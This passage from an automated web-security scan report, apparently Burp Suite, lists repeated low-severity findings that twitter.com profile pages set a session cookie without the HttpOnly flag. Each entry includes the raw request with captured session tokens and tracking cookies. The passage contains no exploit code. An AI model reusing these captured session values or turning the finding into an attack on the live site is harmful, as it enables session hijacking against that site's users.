Confidence:	Firm
Host:	http://twitter.com
Path:	/Beckett_News

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Beckett_News HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.20. http://twitter.com/BosHerald_Edge/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/BosHerald_Edge/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BosHerald_Edge/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.21. http://twitter.com/ChrisLambton13 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ChrisLambton13

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ChrisLambton13 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.22. http://twitter.com/ConanOBrien previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ConanOBrien

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ConanOBrien HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.23. http://twitter.com/DustinPedroia15 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/DustinPedroia15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DustinPedroia15 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.24. http://twitter.com/ExpertDan previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ExpertDan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.25. http://twitter.com/GQMagazine previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/GQMagazine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GQMagazine HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.26. http://twitter.com/Gr8BosFoodBank previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Gr8BosFoodBank

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Gr8BosFoodBank HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.27. http://twitter.com/Harvard previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Harvard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Harvard HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.28. http://twitter.com/Jarvis_Green previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Jarvis_Green

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Jarvis_Green HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.29. http://twitter.com/JennyMcCarthy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/JennyMcCarthy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JennyMcCarthy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.30. http://twitter.com/John_W_Henry previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/John_W_Henry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /John_W_Henry HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.31. http://twitter.com/KaseyRKahl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/KaseyRKahl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KaseyRKahl HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.32. http://twitter.com/KhloeKardashian previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/KhloeKardashian

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

